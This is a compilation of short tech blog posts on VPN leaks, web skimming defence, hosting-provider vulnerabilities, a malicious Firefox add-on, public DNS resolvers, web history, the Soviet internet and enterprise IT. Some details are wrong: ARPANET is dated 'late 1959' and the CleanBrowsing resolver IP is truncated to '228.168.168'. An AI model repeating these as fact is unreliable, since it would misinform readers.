Network Solutions blog: How to Prevent a Data Leak within VPN Environments

It has been one of the first things that most remote workers learn: use a Virtual Private Network (VPN) to connect your laptop when you aren’t in the office. And given that many of us haven’t stepped foot in our offices for months, using a VPN now is ingrained in our daily computer usage. But as VPNs have gotten popular, they are also getting harder to keep secure. Various reports document that private data from 20M users have been leaked because of poorly implemented VPNs, including email passwords and home addresses.

In this post for Network Solutions’ blog, I discuss ways to prevent data leaks from happening and to better secure your VPNs, along with links to the most trusted reviewers of these products.

Network Solutions blog: How to defend against web skimming attacks

Magecart web skimming group targets public hotspots and mobile users | CSO  OnlineYour eCommerce website is vulnerable to a variety of threats known collectively as web skimming. The hackers behind these threats are getting better at penetrating your site and installing their malware to steal your customers’ money and private information. And web skimming is getting more popular both with the rising frequency of attacks and with bigger data breaches recorded. In this post for Network Solutions’ blog, I describe how these attacks work, reference a few of the more newsworthy ones and provide a bunch of tips on how to prevent your own eCommerce site from becoming compromised.

 

The dangers of DreamHost and Go Daddy hosting

If you host your website on GoDaddy, DreamHost, Bluehost, HostGator, OVH or iPage, this blog post is for you. Chances are your site icould be vulnerable to a potential bug or has been purposely infected with something that you probably didn’t know about. Given that millions of websites are involved, this is a moderate big deal.

It used to be that finding a hosting provider was a matter of price and reliability. Now you have to check to see if the vendor actually knows what they are doing. In the past couple of days, I have seen stories such as this one about GoDaddy’s web hosting:

 

And then there is this post, which talks about the other hosting vendors:

Let’s take them one at a time. The GoDaddy issue has to do with their Real User Metrics module. This is used to track traffic to your site. In theory it is a good idea: who doesn’t like more metrics? However, the researcher Igor Kromin, who wrote the post, found the JavaScript module that is used by GoDaddy is so poorly written that it slowed down his site’s performance measurably. Before he published his findings, all GoDaddy hosting customers had these metrics enabled by default. Now they have turned it off by default and are looking at future improvements. Score one for progress.

Why is this a big deal? Supply-chain attacks happen all the time by inserting small snippets of JavaScript code on your pages. It is hard enough to find their origins as it is, without having your hosting provider to add any additional burdens as part of their services. I wrote about this issue here.

If you use GoDaddy hosting, you should go to your cPanel hosting portal, click on the small three dots at the top of the page (as shown above), click “help us” and ensure you have opted out.

Okay, moving on to the second article, about other hosting provider scripting vulnerabilities. Paulos Yibelo looked at several providers and found multiple issues that differed among them. The issues involved cross-site scripting, cross-site request forgery, man-in-the-middle problems, potential account takeovers and bypass attack vulnerabilities. The list is depressingly long, and Yibelo’s descriptions show each provider’s problems. “All of them are easily hacked,” he wrote. But what was more instructive was the responses he got from each hosting vendor. He also mentions that Bluehost terminated his account, presumably because they saw he was up to no good. “Good job, but a little too late,” he wrote.

Most of the providers were very responsive when reporters contacted them and said these issues have now been fixed. OVH hasn’t yet responded.

So the moral of the story? Don’t assume your provider knows everything, or even anything, about hosting your site, and be on the lookout for similar research. Find a smaller provider that can give you better customer service (I have been using EMWD.com for years and can’t recommend them enough). If you don’t know what some of these scripting attacks are or how they work, go on over to OWASP.org and educate yourself about their basics.

Watch that browser add-on

This is a story about how hard it is for normal folks to keep their computers secure. It is a depressing but instructive one. Most of us take for granted that when we bring up our web browser and go to a particular site, we are safe and we know what we see is malware-free. However, that isn’t always the case, and is getting harder.

Many of you make use of browser add-ons for various things: Right now I am running a bunch of them from Google, to view online documents and launch apps. One extension that I rely on is my password manager. I used to have a lot of other ones but found that after the initial excitement (or whatever you want to call it, I know I live a sheltered life) wears off, I don’t really take advantage of them.

So my story today is about an add-on called Web Security. It is oddly named, because it does anything but what it says. And this is the challenge for all of us: many add-ons or smartphone apps have misleading names, because their authors want you to think they are benign. Initially, Mozilla wrote a recommendation for this add-on earlier this month. Then they started getting complaints from users and security researchers. Turns out that they made a big mistake. Web Security tries to track what you are doing in your browsing around the Internet, and could compromise your computer. When Mozilla add-on analyst (that is his real job) Rob Wu looked into this further, he found some very nasty behavior that made it finally clear to him that the add-on was hiding malicious code. Mozilla basically turned off the extension for the hundreds of thousands of users that had installed it and would have been vulnerable. This story on Bleeping Computer provides more details.

In the process of researching this one add-on’s behavior, Wu found 22 other add-ons that did something similar, and they were also disabled and removed from the add-on store. More than half a million Firefox users had at least one of them add-ons installed.

So what can we learn from this tale of woe? One thing is the sobering thought when security experts have trouble identifying badly behaving programs. Granted, this one was found and fixed quickly. But it does give me (and probably you too) pause.

Here are some suggestions. First off, take a look at your extensions. Each browser does this slightly differently. Cisco has a great post here to help you track them down in Chrome and IEv11. Make sure you don’t have anything more than you really need to get your work done. Second, keep your browser version updated. Most of the modern browsers will warn you when it time for an update, and don’t tarry when you see that warning. Finally, be aware of anything odd when you bring up a web page: look closely at the URL and any popups that are displayed. Granted, this can get tedious, but you are ultimately safer.

A new way to speed up your Internet connection

How often do you comment on how slow the Internet is? Now you have a chance to do something to speed it up. Before I tell you, I have to backtrack a bit.

Most of us don’t give a second thought about the Domain Name System (DNS) or how it works to translate “google.com” into its numerical IP address. But that work behind the scenes can make a difference between you having and hot having access to your favorite websites. I explain how the DNS works in this article I wrote ten years ago for PC World.

Back when I wrote that article, there was a growing need for providing better DNS services that were more secure and more private than the default one that comes with your broadband provider. But one of the great things about the Internet is that you usually have lots of choices for something that you are trying to do. Don’t like your hosting provider? Nowadays there are hundreds. Want to find a better server for some particular task? Now everything is in the cloud, and you have your choice of clouds. And so forth.

And now there are various ways to get DNS to your little patch of cyberspace, with the introduction of a free service from Cloudflare. If you haven’t heard of them before, Cloudflare has built an impressive collection of Internet infrastructure around the world, to deliver webpages and other content as quickly as possible, no matter where you are and where the website you are trying to reach is located. If you think about that for a moment, you will realize how difficult a job that is. Given the global reach of the Internet, and how many people are trying to block particular pieces of it (think China, Saudi Arabia, and so forth), you begin to see the scope and achievement of what they have done.

I wanted to test the new 1.1.1.1 DNS service, but I didn’t have the time to do a thorough job.  Now Nykolas has done it for me in this post on Medium. He has somewhat of a DNS testing fetish, which is good because he has collected a lot of great information that can help you make a decision to switch to another DNS provider.

There are these five “legacy” DNS providers that have been operating for years:

  • Google 8.8.8.8: Private and unfiltered. Most popular option and until now the easiest DNS to remember. Their IP address was spray-painted on Turkish buildings (as shown above) during one attempt by their government to block Internet access.
  • OpenDNS 208.67.222.222: Bought by Cisco, they supposedly block malicious domains and offer the option to block adult content.
  • Norton DNS 199.85.126.20: They supposedly block malicious domains and integrate with their Antivirus.
  • Yandex DNS 77.88.8.7: A Russian service that supposedly blocks malicious domains.
  • Comodo DNS 8.26.56.26: They supposedly block malicious domains.

I have used Google, OpenDNS and Comodo over the years in various places and on various pieces of equipment. As an early tester of OpenDNS, I had some problems that I document here on my blog back in 2012.

Then there are the new kids on the block:

  • CleanBrowsing 228.168.168: Private and security aware. Supposedly blocks access to adult content.
  • CloudFlare 1.1.1.1: Private and unfiltered, and just recently announced.
  • Quad9 9.9.9.9: Private and security aware. Supposedly blocks access to malicious domains, based in NYC and part of the NYCSecure project.

How do they all stack up? Nykolas put together this handy feature chart, and you can read his post with the details:

As I mentioned earlier, he did a very thorough job testing the DNS providers from around the globe, using VPNs to connect to their service from 17 different locations. He found that all of the providers performed well across North America and Europe, but elsewhere in the world there were differences. Overall though, CloudFlare was the fastest DNS for 72% of all the locations. It had an amazing low average of 5 ms across the globe. When you think about that figure, it is pretty darn fast. I have seen network latency from one end of my cable network to the other many times that.

So why in my commentary above do I say “supposedly”? Well, because they don’t really block malware. In another Medium post, he compared the various DNS providers’ security filters and found that many of the malware-infested sites he tested weren’t blocked by any of the providers. Granted, he couldn’t test every piece of malware but did test dozens of samples, some new and some old. But he found that the Google “safe browsing” feature did a better job at block malicious content at the individual browser than any of these DNS providers did at the network level.

Given these results, I will probably use the Cloudflare 1.1.1.1 DNS going forward. After all, it is an easy IP address to remember (they worked with one of the regional Internet authorities who have owned that address since the dawn of time), it works well, and plus I like the motivation behind it, as they stated on their blog: “We don’t want to know what you do on the Internet—it’s none of our business—and we’ve taken the technical steps to ensure we can’t.”

One final caveat: speeding up DNS isn’t the only thing you can do to surf the web more quickly. There are many other roadblocks or speed bumps that can delay packets getting to your computer or phone. But it is a very easy way to gain performance, particularly if you rely on a solid infrastructure such as what Cloudflare is providing.

Looking back at 25 years of the world wide web

This week the web has celebrated yet another of its 25th birthdays, and boy does that make me feel old. Like many other great inventions, there are several key dates along the way in its origin story. For example, here is a copy of the original email that Tim Berners-Lee sent back in August 1991, along with an explanation of the context of that message. Steven Vaughan-Nichols has a nice walk down memory lane over at ZDnet here.

Back in 1995, I had some interesting thoughts about those early days of the web as well. This column draws on one that I wrote then, with some current day updates.

I’ve often said that web technology is a lot like radio in the 1920s: station owners are not too sure who is really listening but they are signing up advertisers like crazy, programmers are still feeling around for the best broadcast mechanisms, and standards that are changing fast making for lots of unsure technology that barely works on the best of days. Movies obviously are the metaphor for Java and audio applets and other non-textual additions.

So far, I think the best metaphor for the web is that of a book: something that you’d like to have as a reference source, entertaining when you need it, portable (well, if you tote around a laptop), and so full of information that you would rather leave it on your shelf.

Back in 1995, I was reminded of so-called “electronic books” that were a big deal. One of my favorites then was a 1993 book/disk package called The Electronic Word by Richard Lanham. It is ironically about how computers have changed the face of written communications. The book is my favorite counter-example of on-line books. Lanham is an English professor at UCLA and the book comes with a Hypercard stack that shows both the power of print and how unsatisfactory reading on the screen can be. Prof. Lanham takes you through some of the editing process in the Hypercard version, showing before and after passages that were included in the print version.

But we all don’t want to read stuff on-line, especially dry academic works that contain transcripts of speeches. That is an important design point for webmasters to consider. Many websites are full reference works, and even if we had faster connections to the Internet, we still wouldn’t want to view all that stuff on-screen. Send me a book, or some paper, instead.

aaaSpeaking of eliminating paper, in my column I took a look at what Byte magazine is trying to do with their Virtual Press Room. (The link will take you to a 1996 archive copy, where you can see the beginnings of what others would do later on. As with so many other things, Byte was so far ahead of the curve.)

Byte back then had an intriguing idea of having vendors send their press releases electronically, so editors don’t have to plow through the printed ones. But how about a step further in the interest of saving trees: sending in both the links to the vendor’s own websites and whatever keywords are needed. Years later, I am still asking vendors for key information from their press releases. Some things don’t change, no matter what the technology.

What separates good books from bad is good indexing and great tables of contents. We use both in books to find our way around: the latter more for reference, the former more for determining interest and where to enter its pages. So how many websites have you visited lately that have either, and have done a reasonable job on both? Not many back in 1995, and not many today, sadly. Some things don’t change.

Today we almost take it for granted that numerous enterprise software products have web front-end interfaces, not to mention all the SaaS products that speak native HTML. But back in the mid 1990s, vendors were still struggling with the web interface and trying it on. Cisco had its UniverCD (shown here), which was part CD-ROM and part website. The CD came with a copy of the Mosaic browser so you could look up the latest router firmware and download it online, and when I saw this back in the day I said it was a brilliant use of the two interfaces. Novell (ah, remember them?) had its Market Messenger CD ROM, which also combined the two. There were lots of other book/CD combo packages back then, including Frontier’s Cybersearch product. It had the entire Lycos (a precursor of Google) catalog on CD along with browser and on-ramp tools. Imagine putting the entire index of the Internet on a single CD. Of course, it would be instantly out of date but you can’t fault them for trying.

The reason why vendors combined CDs with the web was because bandwidth was precious and sending images down a dial-up line was painful. (Remember that the first web browser shown at the top of this column was text-only.) If you could off load these images on to a CD, you could have the best of both worlds. At the time, I said that if we wanted to watch movies, we would go to Blockbuster and rent one. Remember Blockbuster? Now we get annoyed if our favorite flick isn’t available to be immediately streamed online.

Yes, the web has come a long ways since its invention, no matter which date you choose to celebrate it. It has been an amazing time to be around and watch its progress, and I count myself lucky that I can use its technology to preserve many of the things that others and I have written about it.

Authentic8 whitepaper: Why a virtual browser is important for your enterprise

The web browser has become the defacto universal user applications interface. It is the mechanism of choice for accessing modern software and services. But because of this ubiquity, it puts a burden on browsers to handle security more carefully.

silo admin console2Because more malware enters via the browser than any other place across the typical network, enterprises are looking for alternatives to the standard browsers. In this white paper that I wrote for Authentic8, makers of the Silo browser (their console is shown here), I talk about some of the issues involved and benefits of using virtual browsers. These tools offer some kind of sandboxing protection to keep malware and infections from spreading across the endpoint computer. This means any web content can’t easily reach the actual endpoint device that is being used to surf the web, so even if it is infected it can be more readily contained.

Why the original Soviet Internet failed

I am reminded today about the cold war with next week being the 30th anniversary of the Chernobyl disaster. But leading up to this unfortunate event were a series of activities during the 1950s and 1960s where we were in a race with the Soviets to produce nuclear weapons, launch manned space vehicles, and create other new technologies. We also were in competition to develop the beginnings of the underlying technology for what would become today’s Internet.

One effort succeeded thanks to well-managed state subsidies and collaborative research that worked closely with a centrally planning authority. The other failed largely because of unregulated competition that was stymied by a variety of self-interests. Ironically, we acted like the socialists and the Soviets acted like the capitalists.

While the origins of the American Internet are well documented, until now there has been little published research into those early Soviet efforts. A new book from Benjamin Peters, a professor at the University of Tulsa, called How Not to Network a Nation seeks to rectify this. While a fairly dry read, it nevertheless is fascinating to see how the historical context unfolded and how the Soviets missed out on being at the forefront of Internet developments, despite early leads in rocketry and computer science.

It wasn’t from lack of effort. From the 1950s onward, a small group of Soviet scientists tried to develop a national computer network. They came close on three separate times, but failed each time. Meanwhile, the progenitor of the Internet, ARPANET, was established in late 1959 in the US and that became the basis for the technology we use every day.

Ultimately the Soviet-style “command economy” proved inflexible and eventually imploded. Instead of being a utopian vision of the common man, it gave us quirky cars like the Lada and a space station Mir that looked like something built out of spare parts.

The Soviets had trouble mainly because of a disconnect between their civilian and military economies. The military didn’t understand how to marshall and manage resources for civilian projects. And when it came time to deal with superstar scientists from its army, they faltered when deciding on proposed civilian projects.

Interestingly, those Soviet efforts at constructing the Internet could have become groundbreaking, had they moved forward. One was the precursor to cloud computing, another was an early digital computer. Both of these efforts were ultimately squashed by their bureaucracies, and you know how the story goes from there. What is more remarkable is that this early computer was Europe’s first, built in an old monastery that didn’t even have indoor plumbing.

Almost a year after ARPANET was created, the Soviets had a meeting to approve their own national computing network. Certainly, having the US ahead of them increased their interest. But they tabled the idea from Vicktor Glushkov and it died in committee. It was bad timing: two of the leaders of the Politburo were absent that day they considered the proposal.

Another leading light was Anatoly Kitov, who proposed in 1959 that civilian economists use computers to solve economic problems. For his efforts, he was dismissed from the army and put through a show trial. Yet during the 1950s the Soviet military had long-distance computer networks and in the 1960s they had local area networks. What they didn’t have were standard protocols and interoperable computers. It wasn’t the technology, but the people, that stopped their development of these projects.

What Peters shows is that the lessons from the failed Soviet Internet (he adoringly calls it the ‘InterNyet’) has to do more with the underlying actors and the intended social consequences than any lack of their combined technical skill. Every step along the route he charts in his book shows that some failure of one or more organizations held back the Soviet Internet from flourishing like it did here in the States. Memos got lost in the mail, decisions were deferred, committees fought over jurisdiction, and so forth. These mundane reasons prevented the Soviet Internet from going anywhere.

You can pre-order the book from Amazon here.

The Evolution of today’s enterprise applications

Enterprises are changing the way they deliver their services, build their enterprise IT architectures and select and deploy their computing systems. These changes are needed, not just to stay current with technology, but also to enable businesses to innovate and grow and surpass their competitors.

In the old days, corporate IT departments built networks and data centers that supported computing monocultures of servers, desktops and routers, all of which was owned, specified, and maintained by the company. Those days are over, and now how you deploy your technologies is critical, what one writer calls “the post-cloud future.” Now we have companies who deliver their IT infrastructure completely from the cloud and don’t own much of anything. IT has moved to being more of a renter than a real estate baron. The raised-floor data center has given way to just a pipe connecting a corporation to the Internet. At the same time, the typical endpoint computing device has gone from a desktop or laptop computer to a tablet or smartphone, often purchased by the end user, who expects his or her IT department to support this choice. The actual device itself has become almost irrelevant, whatever its operating system and form factor.

At the same time, the typical enterprise application has evolved from something that was tested and assembled by an IT department to something that can readily be downloaded and installed at will. This frees IT departments from having to invest time in their “nanny state” approach in tracking which users are running what applications on which endpoints. Instead, they can use these staffers to improve their apps and benefit their business directly. The days when users had to wait on their IT departments to finish a requirements analysis study or go through a lengthy approvals process are firmly in the past. Today, users want their apps here and now. Forget about months: minutes count!

There are big implications for today’s IT departments. To make this new era of on-demand IT work, businesses have to change the way they deliver IT services. They need to make use of some if not all of the following elements:

  • Applications now have Web-front ends, and can be accessed anywhere with a smartphone and a browser. This also means acknowledging that the workday is now 24×7, and users will work with whatever device and whenever and wherever they feel the most productive.
  • Applications have intuitive interfaces: no manuals or training should be necessary. Users don’t want to wait on their IT department for their apps to be activated, on-boarded, installed, or supported.
  • Network latency matters a lot. Users need the fastest possible response times and are going to be running their apps across the globe. IT has to design their Internet access accordingly.
  • Security is built into each app, rather than by defining and protecting a network perimeter.
  • IT staffs will have to evolve away from installing servers and towards managing integrations, provisioning services and negotiating vendor relationships. They will have to examine business processes from a wider lens and understand how their collection of apps will play in this new arena.

 

Network World: Five cloud costing tools reviewed

Certainly, using a cloud provider can be cheaper than purchasing your own hardware, or instrumental in moving a capital expense into an operating one. And there are impressive multi-core hyperscale servers that are now available to anyone for a reasonable monthly fee. But while it is great that cloud providers base their fees on what resources you actually consume, the various elements of your bill are daunting and complex, to say the least.

Separating pricing fact from fiction isn’t easy. For this article, we looked at five shopping comparison services, including Cloudorado, CloudHarmony’s CloudSquare, CloudSpectator, Datapipe and RightScale’s PlanForCloud.com. Some of them cover a lot of providers, some only focus on a few.

You can read the full review in Network World today here.